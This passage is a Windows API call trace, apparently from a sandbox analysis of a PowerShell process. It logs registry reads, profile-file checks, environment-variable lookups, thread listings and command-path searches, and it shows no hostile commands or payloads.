	[0616.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.955] VirtualQuery (in: lpAddress=0x22b9c0, lpBuffer=0x22c880, dwLength=0x30 | out: lpBuffer=0x22c880*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0616.960] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d818 | out: phkResult=0x22d818*=0x38c) returned 0x0
	[0616.960] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d79c, lpData=0x0, lpcbData=0x22d798*=0x0 | out: lpType=0x22d79c*=0x1, lpData=0x0, lpcbData=0x22d798*=0x56) returned 0x0
	[0616.960] CoTaskMemAlloc (cb=0x5a) returned 0x1b7fad40
	[0616.960] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d76c, lpData=0x1b7fad40, lpcbData=0x22d768*=0x56 | out: lpType=0x22d76c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d768*=0x56) returned 0x0
	[0616.960] CoTaskMemFree (pv=0x1b7fad40) 
	[0616.960] RegCloseKey (hKey=0x38c) returned 0x0
	[0616.960] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d818 | out: phkResult=0x22d818*=0x38c) returned 0x0
	[0616.960] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d79c, lpData=0x0, lpcbData=0x22d798*=0x0 | out: lpType=0x22d79c*=0x1, lpData=0x0, lpcbData=0x22d798*=0x56) returned 0x0
	[0616.960] CoTaskMemAlloc (cb=0x5a) returned 0x1b7fad40
	[0616.960] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d76c, lpData=0x1b7fad40, lpcbData=0x22d768*=0x56 | out: lpType=0x22d76c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d768*=0x56) returned 0x0
	[0616.960] CoTaskMemFree (pv=0x1b7fad40) 
	[0616.961] RegCloseKey (hKey=0x38c) returned 0x0
	[0616.961] CoTaskMemAlloc (cb=0x20c) returned 0x1b7c0970
	[0616.961] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7c0970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0616.961] CoTaskMemFree (pv=0x1b7c0970) 
	[0616.961] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x22d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0616.962] CoTaskMemAlloc (cb=0x20c) returned 0x1b7c0970
	[0616.962] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7c0970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0616.962] CoTaskMemFree (pv=0x1b7c0970) 
	[0616.962] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x22d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0616.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x22d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0616.962] SetErrorMode (uMode=0x1) returned 0x1
	[0616.963] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x22d780 | out: lpFileInformation=0x22d780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0616.963] SetErrorMode (uMode=0x1) returned 0x1
	[0616.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x22d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0616.963] SetErrorMode (uMode=0x1) returned 0x1
	[0616.963] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x22d780 | out: lpFileInformation=0x22d780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0616.963] SetErrorMode (uMode=0x1) returned 0x1
	[0616.963] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x22d570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0616.963] SetErrorMode (uMode=0x1) returned 0x1
	[0616.963] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x22d780 | out: lpFileInformation=0x22d780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0616.964] SetErrorMode (uMode=0x1) returned 0x1
	[0616.964] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x22d570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0616.964] SetErrorMode (uMode=0x1) returned 0x1
	[0616.964] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x22d780 | out: lpFileInformation=0x22d780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0616.964] SetErrorMode (uMode=0x1) returned 0x1
	[0616.965] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0616.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.965] CoTaskMemFree (pv=0x38ec90) 
	[0616.965] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0616.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.965] CoTaskMemFree (pv=0x38ec90) 
	[0616.965] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0616.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.966] CoTaskMemFree (pv=0x38ec90) 
	[0616.966] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0616.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.966] CoTaskMemFree (pv=0x38ec90) 
	[0617.442] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0617.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.442] CoTaskMemFree (pv=0x38ec90) 
	[0617.443] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0617.443] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.443] CoTaskMemFree (pv=0x38ec90) 
	[0617.445] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0617.445] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x22d960 | out: lpMode=0x22d960) returned 1
	[0617.446] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0617.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.446] CoTaskMemFree (pv=0x38ec90) 
	[0617.449] SetEvent (hEvent=0x1c4) returned 1
	[0617.449] SetEvent (hEvent=0x38c) returned 1
	[0617.449] SetEvent (hEvent=0x324) returned 1
	[0617.449] SetEvent (hEvent=0x1bc) returned 1
	[0617.451] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0617.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.451] CoTaskMemFree (pv=0x38ec90) 
	[0617.452] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x34c) returned 0x0
	[0617.452] RegQueryValueExW (in: hKey=0x34c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x22d63c, lpData=0x0, lpcbData=0x22d638*=0x0 | out: lpType=0x22d63c*=0x0, lpData=0x0, lpcbData=0x22d638*=0x0) returned 0x2

Thread:
	id = 499
	os_tid = 0x1250


Thread:
	id = 504
	os_tid = 0x1264


Thread:
	id = 843
	os_tid = 0x124c


Thread:
	id = 851
	os_tid = 0x12f8


Thread:
	id = 857
	os_tid = 0x1310


Thread:
	id = 890
	os_tid = 0x12f4


Thread:
	id = 891
	os_tid = 0x878

	[0484.477] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0566.237] LocalFree (hMem=0x327290) returned 0x0
	[0566.237] CloseHandle (hObject=0x314) returned 1
	[0566.237] CloseHandle (hObject=0x13) returned 1
	[0566.238] CloseHandle (hObject=0xf) returned 1
	[0566.238] RegCloseKey (hKey=0x1c0) returned 0x0
	[0566.239] RegCloseKey (hKey=0x1c4) returned 0x0
	[0566.239] RegCloseKey (hKey=0x1bc) returned 0x0
	[0566.239] LocalFree (hMem=0x3272e0) returned 0x0
	[0566.239] RegCloseKey (hKey=0x324) returned 0x0
	[0582.283] RegCloseKey (hKey=0x2f8) returned 0x0
	[0594.316] RegCloseKey (hKey=0x2f8) returned 0x0
	[0609.660] RegCloseKey (hKey=0x388) returned 0x0
	[0609.660] RegCloseKey (hKey=0x384) returned 0x0
	[0609.661] RegCloseKey (hKey=0x360) returned 0x0
	[0609.661] RegCloseKey (hKey=0x39c) returned 0x0
	[0609.661] RegCloseKey (hKey=0x37c) returned 0x0
	[0609.662] RegCloseKey (hKey=0x378) returned 0x0
	[0609.662] RegCloseKey (hKey=0x374) returned 0x0
	[0609.662] RegCloseKey (hKey=0x370) returned 0x0
	[0609.662] RegCloseKey (hKey=0x36c) returned 0x0
	[0609.663] RegCloseKey (hKey=0x368) returned 0x0
	[0609.663] RegCloseKey (hKey=0x364) returned 0x0
	[0609.663] RegCloseKey (hKey=0x33c) returned 0x0
	[0609.663] RegCloseKey (hKey=0x398) returned 0x0
	[0609.664] RegCloseKey (hKey=0x394) returned 0x0
	[0609.664] RegCloseKey (hKey=0x35c) returned 0x0
	[0609.664] RegCloseKey (hKey=0x358) returned 0x0
	[0609.665] RegCloseKey (hKey=0x354) returned 0x0
	[0609.665] RegCloseKey (hKey=0x350) returned 0x0
	[0609.665] RegCloseKey (hKey=0x34c) returned 0x0
	[0609.666] RegCloseKey (hKey=0x348) returned 0x0
	[0609.666] RegCloseKey (hKey=0x344) returned 0x0
	[0609.667] RegCloseKey (hKey=0x340) returned 0x0
	[0609.667] RegCloseKey (hKey=0x390) returned 0x0
	[0609.667] RegCloseKey (hKey=0x330) returned 0x0
	[0609.667] RegCloseKey (hKey=0x32c) returned 0x0
	[0609.668] RegCloseKey (hKey=0x328) returned 0x0
	[0609.668] RegCloseKey (hKey=0x314) returned 0x0
	[0609.668] RegCloseKey (hKey=0x1c0) returned 0x0
	[0609.669] RegCloseKey (hKey=0x1c4) returned 0x0
	[0609.669] RegCloseKey (hKey=0x1bc) returned 0x0
	[0609.669] RegCloseKey (hKey=0x324) returned 0x0
	[0609.669] RegCloseKey (hKey=0x38c) returned 0x0
	[0609.670] RegCloseKey (hKey=0x2f8) returned 0x0
	[0627.484] RegCloseKey (hKey=0x34c) returned 0x0

Thread:
	id = 939
	os_tid = 0x1920


Thread:
	id = 1226
	os_tid = 0xce8

	[0618.179] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0618.187] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0618.192] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0618.192] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0618.192] CoTaskMemFree (pv=0x38ec90) 
	[0618.194] VirtualQuery (in: lpAddress=0x1c78d8a0, lpBuffer=0x1c78e760, dwLength=0x30 | out: lpBuffer=0x1c78e760*(BaseAddress=0x1c78d000, AllocationBase=0x1be00000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0618.197] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0618.197] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0618.197] CoTaskMemFree (pv=0x38ec90) 
	[0618.200] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0618.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0618.200] CoTaskMemFree (pv=0x38ec90) 
	[0618.206] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0618.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0618.206] CoTaskMemFree (pv=0x38ec90) 
	[0618.215] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0618.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0618.964] CoTaskMemFree (pv=0x38ec90) 
	[0618.967] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0618.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0618.967] CoTaskMemFree (pv=0x38ec90) 
	[0618.969] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0618.969] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0618.969] CoTaskMemFree (pv=0x38ec90) 
	[0618.974] VirtualQuery (in: lpAddress=0x1c78db50, lpBuffer=0x1c78ea10, dwLength=0x30 | out: lpBuffer=0x1c78ea10*(BaseAddress=0x1c78d000, AllocationBase=0x1be00000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0618.974] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0618.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0618.975] CoTaskMemFree (pv=0x38ec90) 
	[0618.977] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0618.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0618.977] CoTaskMemFree (pv=0x38ec90) 
	[0618.978] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0618.978] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0618.978] CoTaskMemFree (pv=0x38ec90) 
	[0618.979] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0618.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0618.979] CoTaskMemFree (pv=0x38ec90) 
	[0618.984] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0618.984] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0618.984] CoTaskMemFree (pv=0x38ec90) 
	[0619.784] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0619.784] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0619.784] CoTaskMemFree (pv=0x38ec90) 
	[0619.786] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0619.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0619.786] CoTaskMemFree (pv=0x38ec90) 
	[0619.788] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0619.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0619.788] CoTaskMemFree (pv=0x38ec90) 
	[0619.791] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0619.791] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0619.791] CoTaskMemFree (pv=0x38ec90) 
	[0619.792] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0619.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0619.792] CoTaskMemFree (pv=0x38ec90) 
	[0619.794] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0619.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0619.794] CoTaskMemFree (pv=0x38ec90) 
	[0619.796] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0619.796] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0619.796] CoTaskMemFree (pv=0x38ec90) 
	[0620.850] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0620.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0620.850] CoTaskMemFree (pv=0x38ec90) 
	[0621.816] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0621.816] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0621.816] CoTaskMemFree (pv=0x38ec90) 
	[0621.820] CoTaskMemAlloc (cb=0x104) returned 0x38ec90
	[0621.820] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x38ec90, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0621.821] CoTaskMemFree (pv=0x38ec90) 
	[0621.821] CoTaskMemAlloc (cb=0x128) returned 0x3dd5f0
	[0621.821] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3dd5f0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0621.821] CoTaskMemFree (pv=0x3dd5f0) 
	[0621.826] CoTaskMemAlloc (cb=0x20e) returned 0x1b7c25e0
	[0621.826] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b7c25e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0621.826] CoTaskMemFree (pv=0x1b7c25e0) 
	[0621.829] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0621.834] SetErrorMode (uMode=0x1) returned 0x1
	[0622.743] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0622.753] SetErrorMode (uMode=0x1) returned 0x1
	[0622.755] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0622.755] SetErrorMode (uMode=0x1) returned 0x1
	[0622.755] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0622.763] SetErrorMode (uMode=0x1) returned 0x1
	[0622.764] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0622.764] SetErrorMode (uMode=0x1) returned 0x1
	[0622.765] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0622.772] SetErrorMode (uMode=0x1) returned 0x1
	[0622.774] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0622.774] SetErrorMode (uMode=0x1) returned 0x1
	[0622.774] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0622.782] SetErrorMode (uMode=0x1) returned 0x1
	[0622.783] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0622.783] SetErrorMode (uMode=0x1) returned 0x1
	[0622.783] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c78da80 | out: lpFindFileData=0x1c78da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0623.774] SetErrorMode (uMode=0x1) returned 0x1
	[0623.776] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c78d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0623.776] SetErrorMode (uMode=0x1) returned 0x1
